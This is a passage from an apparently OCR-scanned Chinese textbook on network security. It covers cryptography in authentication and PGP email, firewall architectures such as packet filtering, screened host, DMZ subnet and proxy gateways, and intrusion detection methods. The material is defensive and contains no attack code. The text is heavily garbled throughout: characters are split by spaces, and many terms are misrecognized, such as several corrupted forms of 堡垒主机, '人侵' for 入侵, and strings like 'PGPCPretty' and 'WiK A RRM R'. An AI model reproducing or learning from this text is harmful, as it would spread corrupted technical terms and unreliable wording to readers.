返回 的 加 密 数 据 的 位 数 与 输入 数据 相同 的 特点 ,使 用 循环 结构 进行 迭代 加 密 ,在 该 循环 中 重 
复 置换 和 替换 输入 数据 。 

3. ECC 算法 

ECC 算法 又 称 椭圆 曲线 加 密 算法 ,是 目前 已 知 的 所 有 公 钥 密码 体制 中 能 够 提供 最 高 比 
特 强 度 的 一 种 公 钥 体 制 。 用 椭圆 曲线 构造 密码 体制 ,用 户 可 以 任意 选择 安全 的 椭圆 曲线 ,在 
确定 了 有 限 域 后 ,椭圆 曲线 的 选择 范围 很 大 ;椭圆 曲线 密码 体制 的 另 一 个 优点 是 ,一 旦 选择 
恰当 的 椭圆 曲线 ,就 没有 有 效 的 指数 算法 攻击 它 。 


2.1.3 网 络 安全 应 用 


密码 学 在 网 络 安全 中 的 具体 应 用 主要 包括 以 下 两 种 形式 。 

1. 用 于 认证 服务 

密码 学 在 网 络 安全 应 用 中 使 网 络 上 的 用 户 可 以 相互 证 明 自 己 的 身份 , 即 能 正确 对 信息 
进行 解密 的 用 户 就 是 合法 用 户 。 用 户 在 对 应 用 服务 器 进行 访问 前 ,必须 从 第 三 方 获取 该 应 
用 服务 器 的 访问 许可 证 。 

2. 用 于 提高 电子 邮件 的 安全 性 

目前 ,电子 邮件 广泛 应 用 的 保密 方法 是 PGPCPretty Good Privacy), PGP 采用 的 解决 
方案 是 给 每 个 公 钥 分 配 一 个 密 钥 标识 ,并 在 很 大 概率 上 与 用 户 标 识 一 一 对 应 。 发 送 方 需要 
使 用 一 个 私 钥 加 密 消 息 摘要 ,接收 方 必须 知道 应 使 用 哪个 公 钥 解密 。 相 应 地 ,消息 的 数字 签 
名 部 分 必须 包括 公 钥 对 应 的 64 位 密 钥 标识 。 当 接收 到 消息 后 ,接收 方 用 密 钥 标识 指示 的 公 
钥 验 证 签名 。 

密码 技术 并 不 能 解决 所 有 的 网 络 安全 问题 , 它 需要 与 信息 安全 的 其 他 技术 (如 访问 控制 
技术 、 网 络 监控 技术 等 ) 互 相 融 合 ,形成 综合 的 信息 网 络 安全 保障 。 


2.2 防火 墙 技术 


防火 墙 技术 是 建立 在 现代 通信 网 络 技术 和 信息 安全 技术 基础 上 的 应 用 性 安全 技术 , 越 
来 越 多 地 应 用 于 专用 网 络 与 公用 网 络 的 互联 环境 中 。 防 火 墙 本 身 具 有 较 强 的 抗 攻击 能 力 ， 
它 是 提供 信息 安全 服务 .实现 网 络 和 信息 安全 的 基础 设施 。 


2.2.1 防火 墙 体系 结构 


常见 的 防火 墙 类 型 主要 有 两 种 : 包 过 滤 和 代理 防火 墙 。 防 火 墙 具有 如 下 特征 。 
。 网 络 位 置 特性 : 内 部 网 络 和 外 部 网 络 之 间 的 所 有 网 络 数据 都 必须 经 过 防火 墙 。 
。 工 作 原 理 特性 : 符合 安全 策略 的 数据 才能 通过 防火 墙 。 
。 先决 条 件 : 防火 墙 自身 应 具有 非常 强 的 抗 攻击 能 力 。 
防火 墙 的 基本 体系 结构 包括 屏蔽 路 由 器 、 屏 项 主机 网 关 和 被 屏蔽 子 网 ( 非 军事 区 , 即 
DMZ). 
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1. 包 过 滤 路 由 器 防火 墙 

包 过 滤 路 由 器 是 一 种 便宜 、 简 单 ` 常 见 的 防火 墙 。 包 过 滤 路 由 器 在 网 络 之 间 完 成 数 
据 包 转发 的 普通 路 由 功能 ,并 利用 包 过 滤 规 则 允许 或 拒绝 数据 包 。 包 过 滤 路 由 器 防火 墙 
如 图 2.2.1 所 示 。 


内 部 网 站 


图 221 包 过 滤 路 由 器 防火 墙 


尽管 这 种 防火 墙 系统 有 价格 低 和 易于 使 用 的 优点 ,但 同时 也 有 缺点 ,如 配置 不 当 的 路 由 
器 可 能 受到 攻击 ,以 及 利用 包 于 在 允许 服务 和 系统 内 的 操作 进行 攻击 等 。 由 于 允许 在 内 部 
和 外 部 系统 之 间 直 接 交 换 数据 包 , 因 此 攻击 面 可 能 会 扩展 到 所 有 主机 和 路 由 器 所 允许 的 全 
部 服务 上 。 另 外 ,如 果 有 一 个 包 过 滤 路 由 器 被 渗透 , 则 内 部 网 络 上 的 所 有 系统 都 可 能 会 受到 
损害 。 

2. 屏蔽 主机 防火 墙 

屏蔽 主机 防火 墙 系统 采用 了 包 过 滤 路 由 器 和 堡垒 主机 ,其 组 成 如 图 2. 2. 2 所 示 。 这 个 
防火 墙 系统 提供 的 安全 等 级 比 包 过 滤 路 由 器 要 高 ,因为 它 实 现 了 网 络 层 安全 ( 包 过 滤 ) 和 应 
用 层 安 全 (代理 服务 )。 所 以 ,入 侵 者 在 破坏 内 部 网 络 的 安全 性 之 前 ,必须 首先 渗透 两 种 不 同 
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图 222 屏蔽 主机 防火 墙 ( 单 堡垒 主机 ) 


对 于 这 种 防火 墙 系统 ,堡垒 主机 配置 在 内 部 网 络 上 ,而 包 过 滤 路 由 器 则 放置 在 内 部 网 络 
和 外 部 网 络 之 间 。 在 路 由 器 上 进行 规则 配置 ,使 得 外 部 系统 只 能 访问 堡垒 主 机 ,去 往 内 部 系 
统 上 其 他 主机 的 信息 全 部 被 阻塞 。 由 于 内 部 主机 与 堡垒 主机 处 于 同一 个 网 络 ,内 部 系统 是 
和 否 允 许 直 接 访问 外 部 网 络 ,或 者 是 要 求 使 用 堡垒 主机 上 的 代理 服务 访问 外 部 网 络 ,全 部 由 安 
全 策略 决定 。 对 路 由 器 的 过 滤 规 则 进行 配置 ,使 得 其 只 接收 来 自 堡 公主 机 的 内 部 数据 包 ,并 
强制 内 部 用 户 使 用 代理 服务 。 

如 图 2. 2. 3 所 示 ,用 双 宿 堡 驮 主机 甚至 可 以 构造 更 加 安全 的 防火 墙 系统 。 这 种 物理 结 
构 强 行将 让 所 有 去 往 内 部 网 络 的 信息 经 过 堡垒 主机 ,由 于 堡垒 主机 是 唯一 能 从 外 部 网 络 直 
接 访问 的 内 部 系统 ,因此 有 可 能 受到 攻击 的 主机 只 有 堡垒 主 机 本 身 。 但 是 ,如 果 人 允许 用 户 注 
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册 到 堡垒 主机 ,那么 整个 内 部 网 络 上 的 主机 都 会 受到 攻击 的 威胁 。 牢 固 可 靠 . 避 免 被 渗透 和 
不 允许 用 户 注册 对 堡 侄 主机 来 说 是 至 关 重要 的 。 


内 部 网 站 


图 223 屏蔽 主机 防火 墙 ( 双 宿 堡垒 主机 ) 


3. 屏蔽 子 网 防火 墙 

屏蔽 子 网 防火 墙 采 用 了 两 个 包 过 滤 路 由 器 和 一 个 堡垒 主机 ,如 图 2. 2.4 所 示 。 这 个 防 
火 墙 系统 建立 的 是 最 安全 的 防火 墙 系统 ,因为 在 定义 了 非 军事 区 (CDMZ) 网 络 后 , 它 支 持 网 
络 层 和 应 用 层 安 全 功能 。 网 络 管理 员 将 堡垒 主机 、 信 息 服务 器 .Modem 组 以 及 其 他 公用 服 
务 器 放 在 DMZ 网 络 中 。 通 过 DMZ 网 络 直接 进行 信息 传输 是 严格 禁止 的 。 
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图 224 屏蔽 子 网 防火 墙 


外 部 路 由 器 用 于 防范 通常 的 外 部 攻击 (如 源 地 址 欺骗 和 源 路 由 攻击 ) ,并 管理 外 部 网 络 
到 DMZ 网 络 的 访问 。 它 只 允许 外 部 系统 访问 煲 公 主机 。 内 部 路 由 器 则 提供 第 二 层 防御 ， 
只 接收 来 自 堡垒 主机 的 数据 包 ,负责 管理 DMZ 到 内 部 网 络 的 访问 。 

部 署 屏蔽 子 网 防火 墙 系统 有 如 下 几 个 特别 的 好 处 。 

入 侵 者 必须 突破 3 个 不 同 的 设备 ,才能 侵袭 内 部 网 络 : 外 部 路 由 器 、 堡 又 主机 以 及 内 部 
路 由 器 。 巾 于 外 部 路 由 器 只 能 向 外 部 网 络 通告 DMZ 网 络 的 存在 ,这 样 网 络 管理 员 就 可 以 
保证 内 部 网 络 是 “不 可 见 ” 的 ;由 于 内 部 路 由 器 只 向 内 部 网 络 通告 DMZ 网 络 的 存在 ,内 部 网 
络 上 的 系统 不 能 直接 通 往外 部 网 络 ,这 样 就 保证 了 内 部 网 络 上 的 用 户 必 须 通过 驻 留 在 堡垒 
主机 上 的 代理 服务 才能 访问 外 部 网 络 。 


2.2.2 包 过 滤 防火 墙 


包 过 滤 防 火 墙 工作 在 OSI 网 络 参 考 模型 的 网 络 层 和 传输 层 , 它 根据 数据 包头 的 源 地 
址 、 目 的 地 址 、 端 口号 和 协议 类 型 等 标志 确定 数据 流 是 否 允许 通过 ,如 图 2. 2.5 所 示 。 
包 过 滤 是 一 种 网 络 安全 保护 机 制 , 用 来 控制 进出 网 络 的 数据 流 。 通 过 控制 存在 于 某 一 
网 段 的 数据 流 类 型 , 包 过 滤 技 术 可 以 限定 存在 于 某 一 网 段 的 服务 内 容 。 不 符合 网 络 安全 的 
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图 225 包 过 滤 防 火 墙 的 结构 


服务 将 被 严格 限制 。 基 于 包 中 的 协议 类 型 和 字段 值 .过 滤 路 由 器 能 够 区 分 数据 流量 。 
包 过 滤 的 优点 如 下 : 
”一 个 独立 的 、 网 络 位 置 适 当 的 包 过 滤 路 由 器 有 助 于 保护 整个 网 络 。 如 果 仅 有 一 个 路 
由 器 连接 内 部 与 外 部 网 络 , 不 论 内 部 网 络 大 小 、 拓 扑 结构 如 何 ,通过 单个 路 由 器 进行 
数据 包 过 滤 ,在 网 络 安全 保护 上 都 会 取得 较 好 的 效果 。 
* 数据 包 过 滤 对 用 户 透 明 。 不 同 于 代理 技术 ,数据 包 过 滤 不 要 求 任何 自 定义 配置 ,也 
不 要 求 用 户 进行 任何 特殊 学 习 。 较 强 的 “透明 度 是 包 过 滤 的 一 大 优势 。 

。 过 滤 速 度 快 ,效率 高 。 较 代理 技术 而 言 , 包 过 滤 技 术 只 检查 报头 的 相应 字段 ,一般 不 

查看 数据 包 的 内 容 , 且 核心 部 分 是 由 硬件 实现 的 , 故 转发 速度 快 .效率 高 。 

包 过 滤 的 缺点 如 下 : 

。 不 能 彻底 防止 地 址 欺骗 。 大 多 数 包 过 滤 技 术 都 是 基于 源 IP 地 址 、 目 的 TP 地 址 而 进 
行 过 滤 的 。IP 地 址 的 伪造 是 很 容易 ,很 普遍 的 ,即使 按 MAC 地 址 进行 绑 定 ,也 是 不 
可 信和 的。 对 于 一 些 安全 性 要 求 较 高 的 网 络 , 包 过 滤 技 术 无 法 满足 要 求 。 

部 分 应 用 协议 不 适合 于 数据 包 过 滤 。RPC、X-Window 和 FTP 等 应 用 协议 无 法 适用 
于 包 过 滤 技 术 。 服 务 代理 和 HTTP 链接 也 会 削弱 基于 源 地 址 和 源 端口 的 过 滤 
功能 。 

数据 包 过 滤 技 术 无 法 执行 某 些 安全 策略 。 数 据 包 过 滤 技 术 提 供 的 信息 不 能 完全 满 
足 人 们 对 安全 策略 的 需求 ,不 能 强行 限制 特殊 的 用 户 。 同 样 , 当 通过 端口 号 对 高 级 
协议 强行 进行 限制 时 ,恶意 的 知情 者 能 够 很 容易 地 破坏 这 种 控制 。 

从 以 上 分 析 可 以 看 出 , 包 过 滤 防 火 墙 技术 虽然 能 实现 一 定 的 安全 保护 ,但 是 作为 第 一 代 
防火 墙 技 术 , 其 本 身 存在 较 多 缺陷 ,不 能 提供 较 高 的 安全 性 。 在 实际 应 用 中 ,很 少 把 包 过 滤 
技术 当 作 单独 的 安全 解决 方案 ,通常 把 它 与 其 他 防火 墙 技术 捆绑 起 来 使 用 。 


2.2.3 代理 防火 墙 


代理 防火 墙 是 一 种 较 新 型 的 防火 墙 技术 ,其 特点 是 ,完全 “阻隔 "了 网 络 数 据 流 ,通过 对 
每 种 应 用 服务 编制 专门 的 代理 程序 ,实现 监视 和 控制 应 用 层 数据 流 的 功能 。 它 分 为 应 用 层 
网 关 和 电路 层 网 关 。 

代理 防火 墙 工 作 于 应 用 层 , 且 针 对 特定 的 应 用 层 协 议 。 代 理 防火 墙 通过 软件 方式 获取 
应 用 层 通信 流量 ,并 在 用 户 层 和 应 用 协议 层 提供 访问 控制 ,保持 所 有 应 用 程序 的 使 用 记录 。 
记录 和 控制 所 有 进出 流量 的 能 力 是 应 用 层 网 关 的 主要 优点 之 一 。 
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如 图 2. 2. 6 Brzs ,代理 服务 器 作为 内 部 网 络 客户 端的 服务 器 拦截 住所 有 要 求 , 也 向 客户 
端 转发 响应 。 代 理 客户 (proxy client) 负 责 代表 内 部 客户 端 向 外 部 服务 器 发 出 请 求 ,当然 也 
向 代理 服务 器 转发 响应 。 当 某 用 户 想 和 一 个 运行 代理 的 网 络 建立 联系 时 ,应 用 层 网 关 会 阻 
塞 这 个 连接 ,然后 对 连接 请 求 的 各 个 域 进行 检查 。 如 果 此 连接 请 求 符合 预定 安全 策略 或 规 
则 ,代理 防火 墙 便 会 在 用 户 和 服务 器 之 间 建 立 一 个 “ 桥 ”, 从 而 保证 其 通信 。 对 不 符合 预定 安 
全 规则 的 , 则 阻塞 或 抛弃 。 


真实 的 客户 端 


图 226 应 用 层 网 关 代 理 技术 


另 一 种 类 型 的 代理 技术 称 为 电路 层 网 关 (circuit gateway)。 在 电路 层 网 关中 , 包 被 提交 
至 用 户 应 用 层 处 理 。 电 路 层 网 关 用 来 在 两 个 通信 端 之 间 转 换 包 , 如 图 2. 2.7 所 示 。 


TCP Socket 电路 层 网 关 TCP Socket 
| d 
TCP 
IP 
网 络 接口 
服务 器 客户 机 


图 227 电路 层 网 关 代理 技术 


电路 层 网 关 是 建立 应 用 层 网 关 的 一 个 更 加 灵活 的 方法 。 在 电路 层 网 关中 ,特殊 的 客户 
机 软件 可 能 要 安装 ,用 户 需 要 一 个 用 户 接口 相互 作用 。 
代理 防火 墙 技术 的 优点 如 下 : 
。 代 理 易于 配置 。 由 于 是 软件 ,所 以 代理 较 过 滤 路 由 器 更 易 配 置 。 如 果 代 理 实现 得 
好 , 则 对 配置 协议 的 要 求 可 以 低 一 些 ,从 而 避免 了 配置 错误 。 
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代理 能 生成 各 项 记录 。 代 理工 作 在 应 用 层 , 它 检查 各 项 数据 ,所 以 可 以 生成 各 项 日 
志 、 记 录 。 这 些 日 志 、 记 录 对 于 流量 分 析 .安全 检验 是 十 分 重要 的 。 

代理 能 灵活 地 控制 进出 流量 。 通 过 采取 一 定 的 措施 ,按照 一 定 的 规则 ,可 以 借助 代 
理 实现 一 整套 的 安全 策略 。 

代理 能 过 滤 数 据 内 容 。 可 以 把 一 些 过 滤 规 则 应 用 于 代理 ,让 它 实现 文本 过 滤 、 图 像 
过 滤 .预防 病毒 或 扫描 病毒 等 功能 。 

代理 能 为 用 户 提供 透明 的 加 密 机 制 。 代 理 能 够 完成 加 解密 的 功能 ,从 而 确保 数据 的 
机 密 性 ,这 点 在 虚拟 专用 网 中 特别 重要 。 

代理 可 以 方便 地 与 其 他 安全 手段 集成 。 目 前 的 安全 问题 解决 方案 有 很 多 ,如 认证 
(authentication) , 授权 (authorization) )、 账 号 (accounting)、 数 据 加 密 、 安 全 协议 
(SSL) 等 。 如 果 联 合 使 用 代理 与 这 些 手段 ,将 大 大 增加 网 络 安全 性 。 
代理 技术 的 缺点 如 下 。 

。 代理 速度 较 路 由 器 慢 。 路 由 器 只 是 简单 检查 TCP/IP 报头 特定 的 几 个 域 ,不 做 详细 
分 析 记录。 而 代理 工作 于 应 用 层 ,要 检查 数据 包 的 内 容 , 按 特定 的 应 用 协议 (如 
HTTP) 进 行 审查 、 扫 描 数 据 包 内 容 , 进 行 代 理 ( 转 发 请 求 或 响应 ) ,速度 较 慢 。 
代理 对 用 户 不 透明 。 许 多 代理 要 求 用 户 安装 特定 的 客户 端 软 件 , 这 给 用 户 增 加 了 不 
透明 度 。 安 装 和 配置 特定 的 应 用 程序 既 耗 费时 间 , 又 容易 出 错 。 

代理 服务 不 能 保证 免 受 所 有 协议 弱点 的 限制 。 作 为 一 个 安全 问题 的 解决 方法 ,代理 
取决 于 对 协议 中 哪些 是 安全 操作 的 判断 能 力 。 每 个 应 用 层 协议 都 或 多 或 少 存在 一 
些 安全 问题 ,对 于 一 个 代理 服务 器 来 说 ,要 彻底 避免 这 些 安全 隐患 ,几乎 是 不 可 能 
的 ,除非 关 掉 这 些 服务 。 

代理 不 能 改进 底层 协议 的 安全 性 。 因 为 代理 工作 在 TCP/IP 之 上 ,属于 应 用 层 , 所 
以 它 不 能 改善 底层 通信 协议 的 能 力 ,如 IP 欺骗 .SYN 泛滥 ,伪造 ICMP 消息 和 一 些 
拒绝 服务 攻击 。 而 这 些 方 面 对 于 网 络 的 健壮 性 是 相当 重要 的 。 


2.3 入 侵 检 测 


据 统计 ,全 球 80% 以 上 的 入 侵 来 自 网 络 内 部 。 由 于 性 能 的 限制 ,防火 墙 通 常 不 能 提供 
实时 的 入 侵 检 测 能 力 ,对 于 来 自 内 部 网 络 的 攻击 ,防火 墙 形同虚设 。 入 侵 检 测 是 对 防火 墙 极 
其 有 益 的 补充 。 入 侵 检测 系统 能 在 人 侵 攻击 对 系统 发 生 危 害 前 检测 到 入 侵 攻 击 ,并 利用 报 
警 与 防护 系统 驱逐 入 侵 攻击 ;在 入侵 攻击 过 程 中 ,能 减少 和 人 侵 攻 击 造成 的 损失 ;在 被 入 侵 攻 
击 后 ,收集 入 侵 攻击 的 相关 信息 ,作为 防范 系统 的 知识 添 入 知识 库 内 ,增强 系统 的 防范 能 力 ， 
避免 系统 再 次 受到 入 侵 。 在 不 影响 网 络 性 能 的 情况 下 对 网 络 进行 监听 ,从 而 提供 对 内 部 攻 
击 、 外 部 攻击 和 误 操作 的 实时 保护 ,大 大 提高 了 网 络 的 安全 性 。 


2.3.1 入 侵 检 测 技术 分 类 


入 侵 检测 是 从 计算 机 网 络 或 计算 机 系统 中 的 若干 关键 点 搜集 信息 并 对 其 进行 分 析 , 从 

中 发 现 网 络 或 系统 中 是 否 存在 违反 安全 策略 的 行为 和 遭 到 袭击 的 迹象 的 一 种 机 制 。 入 侵 检 

测 系统 使 用 入 侵 检 测 技术 对 网 络 与 系统 进行 监视 ,并 根据 监视 结果 采取 不 同 的 安全 动作 ,从 
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而 最 大 限度 地 降低 可 能 的 人 侵 危 害 。 经 过 几 年 的 发 展 , 入 侵 检 测 产品 开始 步 和 快速 的 成 
长 期 。 

1. 基于 网 络 的 入 侵 检测 

基于 网 络 的 入 侵 检测 产品 (NIDS) 放 置 在 比较 重要 的 网 段 内 ,不 停 地 监视 网 段 中 的 各 种 
数据 包 , 对 数据 包 进 行 特征 分 析 。 如 果 数 据 包 与 内 置 的 某 些 规则 吻合 ,入 侵 检测 系统 就 会 发 
出 警报 ,甚至 直接 切断 网 络 连接 。 目 前 ,大 部 分 入侵 检测 产品 都 是 基于 网 络 的 。 值 得 一 提 的 
是 ,在 网 络 人 侵 检 测 系 统 中 ,有 多 个 久负盛名 的 开放 源码 软件 ,它们 是 Snort, NFR, 
Shadow 等 。 

网 络 人 侵 检 测 系统 的 优点 如 下 。 

* 网 络 人 侵 检 测 系统 能 够 检测 来 自 网 络 的 攻击 ,特别 是 越权 的 非法 访问 。 

。 不 需要 改变 服务 器 等 主机 的 配置 ,不 占用 过 多 的 系统 资源 ,不 影响 业务 系统 的 性 能 。 

。 发生 故 障 不 会 影响 正常 业务 的 运行 ,部 署 一 个 网 络 人 侵 检 测 系统 的 风险 比 主机 入 侵 

检测 系统 的 风险 少 得 多 。 
网 络 人 侵 检 测 系统 的 弱点 如 下 。 
* 网 络 人 侵 检测 系统 只 检查 直接 连接 网 段 的 通信 ,不 能 检测 在 不 同 网 段 的 网 络 包 。 在 
使 用 交换 以 太 网 的 环境 中 会 出 现 监测 范围 的 局 限 。 而 安装 多 台 网 络 入侵 检测 系统 
的 传感器 会 使 部 署 整个 系统 的 成 本 大 大 增加 。 
网 络 人 侵 检 测 系统 为 了 性 能 目标 通常 采用 特征 检测 的 方法 , 它 可 以 检测 出 普通 的 一 
些 攻击 ,而 很 难 实 现 一 些 复杂 的 需要 大 量 计算 与 分 析 时 间 的 攻击 检测 。 
网 络 人 侵 检 测 系统 可 能 会 将 大 量 的 数据 传 回 分 析 系 统 中 。 在 一 些 系统 中 监听 特定 
的 数据 包 会 产生 大 量 的 分 析 数 据 流量 。 这 种 系统 中 的 传感器 协同 工作 能 力 较 弱 。 
网 络 人 侵 检测 系统 处 理 加 密 的 会 话 过 程 较 困 难 , 目 前 通过 加 密 通道 的 攻击 尚 不 多 ， 
但 随 着 IPv6 的 普及 ,这 个 问题 会 越 来 越 突 出 。 
2. 基于 主机 的 入 侵 检测 
基于 主机 的 入 侵 检测 产品 (HIDS) 通 常安 装 在 被 重点 监测 的 主机 上 ,对 该 主机 的 网 络 连 
接 以 及 系统 审计 日 志 进 行 智能 分 析 和 判断 。 如 果 其 中 主体 活动 十 分 可 疑 , 入 侵 检测 系统 就 
会 采取 相应 措施 。 
主机 入 侵 检测 系统 的 优点 如 下 。 
。 主机 入 侵 检测 系统 与 网 络 和 人 侵 检 测 系统 相 比 ,通常 能 够 提供 更 详尽 的 相关 信息 。 
。 主机 入 侵 检测 系统 通常 情况 下 比 网 络 入侵 检测 系统 误 报 率 要 低 ,因为 检测 主机 上 运 
行 的 命令 序列 比 检测 网 络 流 更 简单 ,系统 的 复杂 性 也 小 得 多 。 

主机 入 侵 检测 系统 的 弱点 如 下 。 

。 主机 入 侵 检测 系统 安装 在 需要 保护 的 设备 上 ,会 降低 应 用 系统 的 效率 。 安 装 了 主机 
入 侵 检测 系统 后 ,将 本 不 允许 安全 管理 员 访 问 的 服务 器 变 成 允许 访问 。 

。 主机 入 侵 检测 系统 依赖 于 服务 器 固有 的 日 志 与 监视 能 力 。 如 果 服 务 器 没有 配置 日 
志 功 能 , 则 必须 重新 配置 ,这 将 会 给 运行 中 的 业务 系统 带 来 不 可 预见 的 性 能 影响 。 

。 全 面部 署 主机 入 侵 检 测 系统 代价 较 大 ,只 能 选择 部 分 主机 保护 。 那 些 未 安装 主机 入 
侵 检 测 系统 的 机 器 将 成 为 保护 的 盲点 ,入侵 者 可 利用 这 些 机 器 达到 攻击 目标 。 

。 主 机 入 侵 检测 系统 除了 监测 自身 的 主机 外 ,根本 不 监测 网 络 上 的 情况 。 对 入 侵 行为 
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进行 分 析 的 工作 量 将 随 主 机 数目 的 增加 而 增加 。 
3. 混合 入 侵 检 测 
基于 网 络 的 入 侵 检 测 产 品 和 基于 主机 的 入 侵 检 测 产 品 都 有 不 足 之 处 ,单纯 使 用 一 类 产 
品 会 造成 主动 防御 体系 不 全 面 。 但 是 ,它们 的 缺陷 是 可 以 互补 的 。 综 合 基于 网 络 和 基于 主 
机 两 种 结构 特点 的 入侵 检测 系统 , 既 可 发 现 网 络 中 的 攻击 信息 ,也 可 从 系统 日 志 中 发 现 异 常 
情况 ,构架 成 一 套 完整 立体 的 主动 防御 体系 , 称 为 混合 人 侵 检测 方法 。 
4. 文件 完整 性 检查 
文件 完整 性 检查 系统 检查 计算 机 中 文件 的 变化 情况 。 文 件 完整 性 检查 系统 保存 了 每 个 
文件 的 数字 文摘 数据 库 , 每 次 检查 时 , 它 重 新 计算 文件 的 数字 文摘 ,并 将 它 与 数据 库 中 的 值 
相 比较 ,如 不 同 , 则 文件 已 被 修改 , 若 相同 , 则 文件 未 发 生变 化 。 
文件 完整 性 检查 系统 的 优点 如 下 。 
。 从 数学 上 分 析 、 攻 克文 件 完 整 性 检查 系统 ,无 论 是 时 间 上 ,还 是 空间 上 ,都 是 不 可 能 
的 。 文 件 完整 性 检查 系统 是 检测 系统 被 非法 使 用 的 重要 工具 之 一 。 
文件 完整 性 检查 系统 具有 相当 的 灵活 性 ,可 以 配置 成 为 监测 系统 中 的 所 有 文件 或 菜 
些 重要 文件 。 
文件 完整 性 检查 系统 的 弱点 如 下 。 
© 文件 完整 性 检查 系统 依赖 于 本 地 的 文摘 数据 库 。 与 日 志文 件 一 样 , 这 些 数据 可 能 被 
入 侵 者 修改 。 
© 做 一 次 完整 的 文件 完整 性 检查 是 一 个 非常 耗 时 的 工作 。 
。 系统 有 些 正常 的 更 新 操作 可 能 会 带 来 大 量 的 文件 更 新 ,从 而 产生 比较 繁杂 的 检查 与 
分 析 工作 。 


2.3.2 入 侵 检测 系统 结构 


人 侵 检测 系统 的 全 称 为 Intrusion Detection System。1980 年 4 月 ,研究 人 员 在 向 美国 
空军 提交 的 一 份 题 为 (计算 机 安全 威胁 监控 与 监视 》 的 技术 报告 中 ,第 一 次 完整 地 介绍 了 入 
侵 检 测 技术 的 概念 。 报 告 认为 ,这 是 一 种 对 计算 机 系统 风险 和 威胁 的 分 类 方法 ,并 将 威胁 分 
为 外 部 渗透 、 内 部 渗透 和 不 法 行为 3 种 ,还 提出 了 利用 审计 跟踪 数据 监视 入 侵 活 动 的 核心 
思想 。 

1. 入 侵 检 测 系 统 结构 介绍 

一 个 入 侵 检测 产品 通常 由 两 部 分 组 成 : 传感器 (sensor) 与 控制 台 (console) 。 传 感 器 负 
责 采 集 数 据 ( 网 络 包 、 系 统 日 志 等 )、 分 析 数 据 并 生成 安全 事件 。 控 制 台 主要 起 到 中 央 管 理 的 
作用 。 商 品 化 的 产品 通常 提供 图 形 界面 的 控制 台 , 这 些 控制 台 基 本 上 都 支持 Windows NT 
平台 。 入 侵 检 测 系统 采用 的 技术 主要 包括 特征 检测 和 异常 检测 两 类 。 

CD 特征 检测 (signature-based detection): 该 类 技术 将 入 侵 活动 定义 为 一 种 模式 ,入 侵 
检测 过 程 则 是 寻找 与 人 侵 行为 相 匹配 的 各 种 模式 。 该 类 技术 能 够 很 准确 地 将 已 有 的 人 侵 行 
为 检查 出 来 ;但 由 于 缺乏 相 匹 配 的 模式 , 故 无 法 检测 到 新 的 入 侵 行为 。 特 征 检测 方式 与 计算 
机 病毒 扫描 技术 类 似 , 核 心 问题 在 于 如 何 设计 模式 , 尽 可 能 地 将 各 种 非法 活动 事 括 进来 。 

(2) 异常 检测 (abnormally detection): 首先 ,检测 系统 预先 定义 出 一 组 正常 运行 的 环境 
变量 ,主要 包括 CPU 运行 情况 、 内 存 利 用 率 、 网 络 平均 流量 等 ,这 些 环境 信息 可 以 人 为 地 根 
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据 经 验 知识 定义 ,也 可 以 采用 统计 方法 根据 系统 日 常 运行 情况 得 出 。 当 入 侵 检测 系统 在 检 
测 过 程 中 发 现 运行 数据 与 预先 定义 环境 参数 差异 较 大 时 ,系统 就 会 认定 存在 和 人 侵 情况 ,并 进 
一 步 进 行 检查 。 这 类 技术 的 核心 问题 是 如 何 准确 地 定义 系统 正常 的 环境 变量 。 

2. 常用 的 入 侵 检 测 方 法 

据 公 安 部 计算 机 信息 系统 安全 产品 质量 监督 检验 中 心 的 报告 ,国内 送 检 的 人 侵 检测 产 
品 中 95% 属 于 使 用 入 侵 模板 进行 模式 匹配 的 特征 检测 产品 ,少量 是 采用 概率 统计 的 统计 检 
测 产品 与 基于 日 志 的 专家 知识 库 系统 产品 。 和 侵 检 测 系 统 常用 的 检测 方法 有 特征 检测 、 统 
计 检测 与 专家 系统 。 

1) 特征 检测 

特征 检测 对 已 知 的 攻击 或 入侵 的 方式 做 出 确定 性 的 描述 ,形成 相应 的 事件 模式 。 当 被 
审计 的 事件 与 已 知 的 入 侵 事 件 模 式 相 匹配 时 , 即 报警 。 该 方法 预报 检测 的 准确 率 较 高 ,但 对 
于 无 经 验 知识 的 入侵 与 攻击 行为 无 能 为 力 。 

2) 统计 检测 

在 统计 模型 中 常用 的 测量 参数 包括 审计 事件 的 数量 ,间隔 时 间 ,资源 消耗 情况 等 。 常 用 
的 人 侵 检 测 包括 5 种 统计 模型 。 

CD 操作 模型 ,该 模型 假设 异常 可 通过 测量 结果 与 一 些 固定 指 标 相 比较 得 到 ,固定 指标 
可 以 根据 经 验 值 或 一 段 时 间 内 的 统计 平均 得 到 。 

(2) 方差 ,计算 参数 的 方差 , 设 定 其 置信 区 间 , 当 测 量 值 超过 置信 区 间 的 范围 时 ,表明 有 
可 能 是 异常 。 

(3) 多 元 模型 ,操作 模型 的 扩展 ,通过 同时 分 析 多 个 参数 实现 检测 。 

(4) 马尔 科 夫 过 程 模型 ,将 每 种 类 型 的 事件 定义 为 系统 状态 ,用 状态 转移 矩阵 表示 状态 
的 变化 , 若 该 状态 矩阵 转移 的 概率 较 小 , 则 可 能 是 异常 事件 。 

(5) 时 间 序 列 分 析 ,将 事件 计数 与 资源 消耗 用 时 间 排 成 序列 ,如 果 一 个 新 事件 在 该 时 间 
发 生 的 概率 较 低 , 则 该 事件 可 能 是 入 侵 。 

3) 专家 系统 

用 专家 系统 对 入 侵 进 行 检测 ,经常 针对 的 是 特征 入 侵 行为 。 专 家 系统 的 建立 依赖 于 知 
识 库 的 完备 性 ,知识 库 的 完备 性 又 取决 于 审计 记录 的 完备 性 与 实时 性 。 入 侵 的 特征 抽取 与 
表达 是 入 侵 检 测 专家 系统 的 关键 。 专 家 系统 防范 的 有 效 性 完全 取决 于 专家 系统 知识 库 的 完 
备 性 。 


2.3.3 重要 的 入 侵 检测 系统 


重要 的 入侵 检测 系统 按照 检测 对 象 划 分 ,可 分 为 以 下 4 种。 

CD 系统 完整 性 检测 (System Integrity Verifiers, SIV) 系 统 主要 用 于 检测 系统 文件 或 
注册 表 等 重要 位 置信 息 是 否 被 算 改 ,防止 入 侵 者 在 和 人 侵 过 程 留 下 系统 的 后 门 。 该 类 系统 的 
工具 软件 较 多 ,如 Tripwire, 它 可 以 检测 到 重要 系统 组 件 的 变动 ,但 不 产生 实时 报警 信息 。 

(2) WiK A RRM R Network Intrusion Detection System. NIDS) 主 要 用 于 检测 黑 
客 或 骇 客 通过 网 络 进行 的 各 类 入 侵 行为 。NIDS 的 运用 方式 有 两 种 , 即 在 目标 主机 上 以 监 
